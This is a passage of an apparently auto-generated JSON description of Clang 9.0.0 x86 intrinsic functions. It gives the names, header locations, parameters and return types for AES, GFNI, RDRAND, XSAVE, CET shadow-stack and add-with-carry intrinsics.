"name": "__A", "type": { "tag": "__m512i" } }, { "tag": "parameter", "name": "__B", "type": { "tag": "__m512i" } }], "return-type": { "tag": "__m512i" } }, { "tag": "function", "name": "_mm256_aesenclast_epi128", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/vaesintrin.h:53:2", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__A", "type": { "tag": "__m256i" } }, { "tag": "parameter", "name": "__B", "type": { "tag": "__m256i" } }], "return-type": { "tag": "__m256i" } }, { "tag": "function", "name": "_mm512_aesenclast_epi128", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/vaesintrin.h:60:2", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__A", "type": { "tag": "__m512i" } }, { "tag": "parameter", "name": "__B", "type": { "tag": "__m512i" } }], "return-type": { "tag": "__m512i" } }, { "tag": "function", "name": "_mm256_aesdeclast_epi128", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/vaesintrin.h:67:2", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__A", "type": { "tag": "__m256i" } }, { "tag": "parameter", "name": "__B", "type": { "tag": "__m256i" } }], "return-type": { "tag": "__m256i" } }, { "tag": "function", "name": "_mm512_aesdeclast_epi128", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/vaesintrin.h:74:2", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__A", "type": { "tag": "__m512i" } }, { "tag": "parameter", "name": "__B", "type": { "tag": "__m512i" } }], "return-type": { "tag": "__m512i" } }, { "tag": "function", "name": "_mm_gf2p8mul_epi8", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/gfniintrin.h:122:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__A", "type": { "tag": "__m128i" } }, { "tag": "parameter", "name": "__B", "type": { "tag": "__m128i" } }], "return-type": { "tag": "__m128i" } }, { "tag": "function", "name": "_mm_mask_gf2p8mul_epi8", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/gfniintrin.h:129:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__S", "type": { "tag": "__m128i" } }, { "tag": "parameter", "name": "__U", "type": { "tag": "__mmask16" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m128i" } }, { "tag": "parameter", "name": "__B", "type": { "tag": "__m128i" } }], "return-type": { "tag": "__m128i" } }, { "tag": "function", "name": "_mm_maskz_gf2p8mul_epi8", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/gfniintrin.h:137:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__U", "type": { "tag": "__mmask16" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m128i" } }, { "tag": "parameter", "name": "__B", "type": { "tag": "__m128i" } }], "return-type": { "tag": "__m128i" } }, { "tag": "function", "name": "_mm256_gf2p8mul_epi8", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/gfniintrin.h:144:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__A", "type": { "tag": "__m256i" } }, { "tag": "parameter", "name": "__B", "type": { "tag": "__m256i" } }], "return-type": { "tag": "__m256i" } }, { "tag": "function", "name": "_mm256_mask_gf2p8mul_epi8", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/gfniintrin.h:151:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__S", "type": { "tag": "__m256i" } }, { "tag": "parameter", "name": "__U", "type": { "tag": "__mmask32" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m256i" } }, { "tag": "parameter", "name": "__B", "type": { "tag": "__m256i" } }], "return-type": { "tag": "__m256i" } }, { "tag": "function", "name": "_mm256_maskz_gf2p8mul_epi8", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/gfniintrin.h:159:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__U", "type": { "tag": "__mmask32" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m256i" } }, { "tag": "parameter", "name": "__B", "type": { "tag": "__m256i" } }], "return-type": { "tag": "__m256i" } }, { "tag": "function", "name": "_mm512_gf2p8mul_epi8", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/gfniintrin.h:166:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__A", "type": { "tag": "__m512i" } }, { "tag": "parameter", "name": "__B", "type": { "tag": "__m512i" } }], "return-type": { "tag": "__m512i" } }, { "tag": "function", "name": "_mm512_mask_gf2p8mul_epi8", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/gfniintrin.h:173:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__S", "type": { "tag": "__m512i" } }, { "tag": "parameter", "name": "__U", "type": { "tag": "__mmask64" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m512i" } }, { "tag": "parameter", "name": "__B", "type": { "tag": "__m512i" } }], "return-type": { "tag": "__m512i" } }, { "tag": "function", "name": "_mm512_maskz_gf2p8mul_epi8", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/gfniintrin.h:181:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__U", "type": { "tag": "__mmask64" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m512i" } }, { "tag": "parameter", "name": "__B", "type": { "tag": "__m512i" } }], "return-type": { "tag": "__m512i" } }, { "tag": "function", "name": "_rdpid_u32", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/immintrin.h:212:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [], "return-type": { "tag": ":unsigned-int", "bit-size": 32, "bit-alignment": 32 } }, { "tag": "function", "name": "_rdrand16_step", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/immintrin.h:219:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__p", "type": { "tag": ":pointer", "type": { "tag": ":unsigned-short", "bit-size": 16, "bit-alignment": 16 } } }], "return-type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } }, { "tag": "function", "name": "_rdrand32_step", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/immintrin.h:225:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__p", "type": { "tag": ":pointer", "type": { "tag": ":unsigned-int", "bit-size": 32, "bit-alignment": 32 } } }], "return-type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } }, { "tag": "function", "name": "_rdrand64_step", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/immintrin.h:232:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__p", "type": { "tag": ":pointer", "type": { "tag": ":unsigned-long-long", "bit-size": 64, "bit-alignment": 64 } } }], "return-type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } }, { "tag": "function", "name": "_readfsbase_u32", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/immintrin.h:242:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [], "return-type": { "tag": ":unsigned-int", "bit-size": 32, "bit-alignment": 32 } }, { "tag": "function", "name": "_readfsbase_u64", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/immintrin.h:248:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [], "return-type": { "tag": ":unsigned-long-long", "bit-size": 64, "bit-alignment": 64 } }, { "tag": "function", "name": "_readgsbase_u32", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/immintrin.h:254:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [], "return-type": { "tag": ":unsigned-int", "bit-size": 32, "bit-alignment": 32 } }, { "tag": "function", "name": "_readgsbase_u64", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/immintrin.h:260:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [], "return-type": { "tag": ":unsigned-long-long", "bit-size": 64, "bit-alignment": 64 } }, { "tag": "function", "name": "_writefsbase_u32", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/immintrin.h:266:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__V", "type": { "tag": ":unsigned-int", "bit-size": 32, "bit-alignment": 32 } }], "return-type": { "tag": ":void" } }, { "tag": "function", "name": "_writefsbase_u64", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/immintrin.h:272:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__V", "type": { "tag": ":unsigned-long-long", "bit-size": 64, "bit-alignment": 64 } }], "return-type": { "tag": ":void" } }, { "tag": "function", "name": "_writegsbase_u32", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/immintrin.h:278:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__V", "type": { "tag": ":unsigned-int", "bit-size": 32, "bit-alignment": 32 } }], "return-type": { "tag": ":void" } }, { "tag": "function", "name": "_writegsbase_u64", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/immintrin.h:284:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__V", "type": { "tag": ":unsigned-long-long", "bit-size": 64, "bit-alignment": 64 } }], "return-type": { "tag": ":void" } }, { "tag": "function", "name": "_loadbe_i16", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/immintrin.h:301:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__P", "type": { "tag": ":pointer", "type": { "tag": ":void" } } }], "return-type": { "tag": ":short", "bit-size": 16, "bit-alignment": 16 } }, { "tag": "function", "name": "_storebe_i16", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/immintrin.h:309:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__P", "type": { "tag": ":pointer", "type": { "tag": ":void" } } }, { "tag": "parameter", "name": "__D", "type": { "tag": ":short", "bit-size": 16, "bit-alignment": 16 } }], "return-type": { "tag": ":void" } }, { "tag": "function", "name": "_loadbe_i32", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/immintrin.h:317:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__P", "type": { "tag": ":pointer", "type": { "tag": ":void" } } }], "return-type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } }, { "tag": "function", "name": "_storebe_i32", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/immintrin.h:325:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__P", "type": { "tag": ":pointer", "type": { "tag": ":void" } } }, { "tag": "parameter", "name": "__D", "type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } }], "return-type": { "tag": ":void" } }, { "tag": "function", "name": "_loadbe_i64", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/immintrin.h:334:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__P", "type": { "tag": ":pointer", "type": { "tag": ":void" } } }], "return-type": { "tag": ":long-long", "bit-size": 64, "bit-alignment": 64 } }, { "tag": "function", "name": "_storebe_i64", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/immintrin.h:342:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__P", "type": { "tag": ":pointer", "type": { "tag": ":void" } } }, { "tag": "parameter", "name": "__D", "type": { "tag": ":long-long", "bit-size": 64, "bit-alignment": 64 } }], "return-type": { "tag": ":void" } }, { "tag": "function", "name": "_xbegin", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/rtmintrin.h:30:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [], "return-type": { "tag": ":unsigned-int", "bit-size": 32, "bit-alignment": 32 } }, { "tag": "function", "name": "_xend", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/rtmintrin.h:36:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [], "return-type": { "tag": ":void" } }, { "tag": "function", "name": "_xtest", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/xtestintrin.h:23:5", "variadic": false, "inline": true, "storage-class": "static", "parameters": [], "return-type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } }, { "tag": "function", "name": "_mm_sha1nexte_epu32", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/shaintrin.h:24:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__X", "type": { "tag": "__m128i" } }, { "tag": "parameter", "name": "__Y", "type": { "tag": "__m128i" } }], "return-type": { "tag": "__m128i" } }, { "tag": "function", "name": "_mm_sha1msg1_epu32", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/shaintrin.h:30:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__X", "type": { "tag": "__m128i" } }, { "tag": "parameter", "name": "__Y", "type": { "tag": "__m128i" } }], "return-type": { "tag": "__m128i" } }, { "tag": "function", "name": "_mm_sha1msg2_epu32", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/shaintrin.h:36:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__X", "type": { "tag": "__m128i" } }, { "tag": "parameter", "name": "__Y", "type": { "tag": "__m128i" } }], "return-type": { "tag": "__m128i" } }, { "tag": "function", "name": "_mm_sha256rnds2_epu32", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/shaintrin.h:42:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__X", "type": { "tag": "__m128i" } }, { "tag": "parameter", "name": "__Y", "type": { "tag": "__m128i" } }, { "tag": "parameter", "name": "__Z", "type": { "tag": "__m128i" } }], "return-type": { "tag": "__m128i" } }, { "tag": "function", "name": "_mm_sha256msg1_epu32", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/shaintrin.h:48:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__X", "type": { "tag": "__m128i" } }, { "tag": "parameter", "name": "__Y", "type": { "tag": "__m128i" } }], "return-type": { "tag": "__m128i" } }, { "tag": "function", "name": "_mm_sha256msg2_epu32", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/shaintrin.h:54:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__X", "type": { "tag": "__m128i" } }, { "tag": "parameter", "name": "__Y", "type": { "tag": "__m128i" } }], "return-type": { "tag": "__m128i" } }, { "tag": "function", "name": "_fxsave", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/fxsrintrin.h:30:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__p", "type": { "tag": ":pointer", "type": { "tag": ":void" } } }], "return-type": { "tag": ":void" } }, { "tag": "function", "name": "_fxrstor", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/fxsrintrin.h:48:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__p", "type": { "tag": ":pointer", "type": { "tag": ":void" } } }], "return-type": { "tag": ":void" } }, { "tag": "function", "name": "_fxsave64", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/fxsrintrin.h:65:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__p", "type": { "tag": ":pointer", "type": { "tag": ":void" } } }], "return-type": { "tag": ":void" } }, { "tag": "function", "name": "_fxrstor64", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/fxsrintrin.h:83:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__p", "type": { "tag": ":pointer", "type": { "tag": ":void" } } }], "return-type": { "tag": ":void" } }, { "tag": "function", "name": "_xsave", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/xsaveintrin.h:25:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__p", "type": { "tag": ":pointer", "type": { "tag": ":void" } } }, { "tag": "parameter", "name": "__m", "type": { "tag": ":unsigned-long-long", "bit-size": 64, "bit-alignment": 64 } }], "return-type": { "tag": ":void" } }, { "tag": "function", "name": "_xrstor", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/xsaveintrin.h:30:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__p", "type": { "tag": ":pointer", "type": { "tag": ":void" } } }, { "tag": "parameter", "name": "__m", "type": { "tag": ":unsigned-long-long", "bit-size": 64, "bit-alignment": 64 } }], "return-type": { "tag": ":void" } }, { "tag": "function", "name": "_xsave64", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/xsaveintrin.h:50:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__p", "type": { "tag": ":pointer", "type": { "tag": ":void" } } }, { "tag": "parameter", "name": "__m", "type": { "tag": ":unsigned-long-long", "bit-size": 64, "bit-alignment": 64 } }], "return-type": { "tag": ":void" } }, { "tag": "function", "name": "_xrstor64", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/xsaveintrin.h:55:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__p", "type": { "tag": ":pointer", "type": { "tag": ":void" } } }, { "tag": "parameter", "name": "__m", "type": { "tag": ":unsigned-long-long", "bit-size": 64, "bit-alignment": 64 } }], "return-type": { "tag": ":void" } }, { "tag": "function", "name": "_xsaveopt", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/xsaveoptintrin.h:21:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__p", "type": { "tag": ":pointer", "type": { "tag": ":void" } } }, { "tag": "parameter", "name": "__m", "type": { "tag": ":unsigned-long-long", "bit-size": 64, "bit-alignment": 64 } }], "return-type": { "tag": ":void" } }, { "tag": "function", "name": "_xsaveopt64", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/xsaveoptintrin.h:27:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__p", "type": { "tag": ":pointer", "type": { "tag": ":void" } } }, { "tag": "parameter", "name": "__m", "type": { "tag": ":unsigned-long-long", "bit-size": 64, "bit-alignment": 64 } }], "return-type": { "tag": ":void" } }, { "tag": "function", "name": "_xsavec", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/xsavecintrin.h:21:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__p", "type": { "tag": ":pointer", "type": { "tag": ":void" } } }, { "tag": "parameter", "name": "__m", "type": { "tag": ":unsigned-long-long", "bit-size": 64, "bit-alignment": 64 } }], "return-type": { "tag": ":void" } }, { "tag": "function", "name": "_xsavec64", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/xsavecintrin.h:27:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__p", "type": { "tag": ":pointer", "type": { "tag": ":void" } } }, { "tag": "parameter", "name": "__m", "type": { "tag": ":unsigned-long-long", "bit-size": 64, "bit-alignment": 64 } }], "return-type": { "tag": ":void" } }, { "tag": "function", "name": "_xsaves", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/xsavesintrin.h:21:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__p", "type": { "tag": ":pointer", "type": { "tag": ":void" } } }, { "tag": "parameter", "name": "__m", "type": { "tag": ":unsigned-long-long", "bit-size": 64, "bit-alignment": 64 } }], "return-type": { "tag": ":void" } }, { "tag": "function", "name": "_xrstors", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/xsavesintrin.h:26:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__p", "type": { "tag": ":pointer", "type": { "tag": ":void" } } }, { "tag": "parameter", "name": "__m", "type": { "tag": ":unsigned-long-long", "bit-size": 64, "bit-alignment": 64 } }], "return-type": { "tag": ":void" } }, { "tag": "function", "name": "_xrstors64", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/xsavesintrin.h:32:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__p", "type": { "tag": ":pointer", "type": { "tag": ":void" } } }, { "tag": "parameter", "name": "__m", "type": { "tag": ":unsigned-long-long", "bit-size": 64, "bit-alignment": 64 } }], "return-type": { "tag": ":void" } }, { "tag": "function", "name": "_xsaves64", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/xsavesintrin.h:37:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__p", "type": { "tag": ":pointer", "type": { "tag": ":void" } } }, { "tag": "parameter", "name": "__m", "type": { "tag": ":unsigned-long-long", "bit-size": 64, "bit-alignment": 64 } }], "return-type": { "tag": ":void" } }, { "tag": "function", "name": "_incsspd", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/cetintrin.h:21:43", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__a", "type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } }], "return-type": { "tag": ":void" } }, { "tag": "function", "name": "_incsspq", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/cetintrin.h:26:43", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__a", "type": { "tag": ":unsigned-long-long", "bit-size": 64, "bit-alignment": 64 } }], "return-type": { "tag": ":void" } }, { "tag": "function", "name": "_inc_ssp", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/cetintrin.h:32:43", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__a", "type": { "tag": ":unsigned-int", "bit-size": 32, "bit-alignment": 32 } }], "return-type": { "tag": ":void" } }, { "tag": "function", "name": "_rdsspd", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/cetintrin.h:41:51", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__a", "type": { "tag": ":unsigned-int", "bit-size": 32, "bit-alignment": 32 } }], "return-type": { "tag": ":unsigned-int", "bit-size": 32, "bit-alignment": 32 } }, { "tag": "function", "name": "_rdsspq", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/cetintrin.h:46:57", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__a", "type": { "tag": ":unsigned-long-long", "bit-size": 64, "bit-alignment": 64 } }], "return-type": { "tag": ":unsigned-long-long", "bit-size": 64, "bit-alignment": 64 } }, { "tag": "function", "name": "_get_ssp", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/cetintrin.h:52:57", "variadic": false, "inline": true, "storage-class": "static", "parameters": [], "return-type": { "tag": ":unsigned-long-long", "bit-size": 64, "bit-alignment": 64 } }, { "tag": "function", "name": "_saveprevssp", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/cetintrin.h:61:43", "variadic": false, "inline": true, "storage-class": "static", "parameters": [], "return-type": { "tag": ":void" } }, { "tag": "function", "name": "_rstorssp", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/cetintrin.h:65:43", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__p", "type": { "tag": ":pointer", "type": { "tag": ":void" } } }], "return-type": { "tag": ":void" } }, { "tag": "function", "name": "_wrssd", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/cetintrin.h:69:43", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__a", "type": { "tag": ":unsigned-int", "bit-size": 32, "bit-alignment": 32 } }, { "tag": "parameter", "name": "__p", "type": { "tag": ":pointer", "type": { "tag": ":void" } } }], "return-type": { "tag": ":void" } }, { "tag": "function", "name": "_wrssq", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/cetintrin.h:74:43", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__a", "type": { "tag": ":unsigned-long-long", "bit-size": 64, "bit-alignment": 64 } }, { "tag": "parameter", "name": "__p", "type": { "tag": ":pointer", "type": { "tag": ":void" } } }], "return-type": { "tag": ":void" } }, { "tag": "function", "name": "_wrussd", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/cetintrin.h:79:43", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__a", "type": { "tag": ":unsigned-int", "bit-size": 32, "bit-alignment": 32 } }, { "tag": "parameter", "name": "__p", "type": { "tag": ":pointer", "type": { "tag": ":void" } } }], "return-type": { "tag": ":void" } }, { "tag": "function", "name": "_wrussq", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/cetintrin.h:84:43", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__a", "type": { "tag": ":unsigned-long-long", "bit-size": 64, "bit-alignment": 64 } }, { "tag": "parameter", "name": "__p", "type": { "tag": ":pointer", "type": { "tag": ":void" } } }], "return-type": { "tag": ":void" } }, { "tag": "function", "name": "_setssbsy", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/cetintrin.h:89:43", "variadic": false, "inline": true, "storage-class": "static", "parameters": [], "return-type": { "tag": ":void" } }, { "tag": "function", "name": "_clrssbsy", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/cetintrin.h:93:43", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__p", "type": { "tag": ":pointer", "type": { "tag": ":void" } } }], "return-type": { "tag": ":void" } }, { "tag": "function", "name": "_addcarryx_u32", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/adxintrin.h:22:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__cf", "type": { "tag": ":unsigned-char", "bit-size": 8, "bit-alignment": 8 } }, { "tag": "parameter", "name": "__x", "type": { "tag": ":unsigned-int", "bit-size": 32, "bit-alignment": 32 } }, { "tag": "parameter", "name": "__y", "type": { "tag": ":unsigned-int", "bit-size": 32, "bit-alignment": 32 } }, { "tag": "parameter", "name": "__p", "type": { "tag": ":pointer", "type": { "tag": ":unsigned-int", "bit-size": 32, "bit-alignment": 32 } } }], "return-type": { "tag": ":unsigned-char", "bit-size": 8, "bit-alignment": 8 } }, { "tag": "function", "name": "_addcarryx_u64", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/adxintrin.h:30:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__cf", "type": { "tag": ":unsigned-char", "bit-size": 8, "bit-alignment": 8 } }, { "tag": "parameter", "name": "__x", "type": { "tag": ":unsigned-long-long", "bit-size": 64, "bit-alignment": 64 } }, { "tag": "parameter", "name": "__y", "type": { "tag": ":unsigned-long-long", "bit-size": 64, "bit-alignment": 64 } }, { "tag": "parameter", "name": "__p", "type": { "tag": ":pointer", "type": { "tag": ":unsigned-long-long", "bit-size": 64, "bit-alignment": 64 } } }], "return-type": { "tag": ":unsigned-char", "bit-size": 8, "bit-alignment": 8 } }, { "tag": "function", "name": "_addcarry_u32", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/adxintrin.h:39:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__cf", "type": { "tag": ":unsigned-char", "bit-size": 8, "bit-alignment": 8 } }, { "tag": "parameter", "name": "__x", "type": { "tag": ":unsigned-int", "bit-size": 32, "bit-alignment": 32 } }, { "tag": "parameter", "name": "__y", "type": { "tag": ":unsigned-int", "bit-size": 32, "bit-alignment": 32 } }, { "tag": "parameter", "name": "__p", "type": { "tag": ":pointer", "type": { "tag": ":unsigned-int", "bit-size": 32, "bit-alignment": 32 } } }], "return-type": { "tag": ":unsigned-char", "bit-size": 8, "bit-alignment": 8 } }, { "tag": "function", "name": "_addcarry_u64", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/adxintrin.h:47:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__cf", "type": { "tag": ":unsigned-char", "bit-size": 8, "bit-alignment": 8 } }, { "tag": "parameter", "name": "__x", "type": { "tag": ":unsigned-long-long", "bit-size": 64, "bit-alignment": 64 } }, { "tag": "parameter", "name": "__y", "type": { "tag": ":unsigned-long-long", "bit-size": 64, "bit-alignment": 64 } }, { "tag": "parameter", "name": "__p", "type": { "tag": ":pointer", "type": { "tag": ":unsigned-long-long", "bit-size": 64, "bit-alignment": 64 } } }], "return-type": { "tag": ":unsigned-char", "bit-size": 8, "bit-alignment": 8 } }, { "tag": "function", "name": "_subborrow_u32", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/adxintrin.h:55:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__cf", "type": { "tag": ":unsigned-char", "bit-size": 8, "bit-alignment": 8 } }, { "tag": "parameter", "name": "__x", "type": { "tag": ":unsigned-int", "bit-size": 32, "bit-alignment": 32 } }, { "tag": "parameter", "name": "__y", "type": { "tag": ":unsigned-int", "bit-size": 32, "bit-alignment": 32 } }, { "tag": "parameter", "name": "__p", "type": { "tag": ":pointer", "type": { "tag": ":unsigned-int", "bit-size": 32, "bit-alignment": 32 } } }], "return-type": { "tag": ":unsigned-char", "bit-size": 8, "bit-alignment": 8 } }, { "tag": "function", "name": "_subborrow_u64", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/adxintrin.h:63:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__cf", "type": { "tag": ":unsigned-char", "bit-size": 8, "bit-alignment": 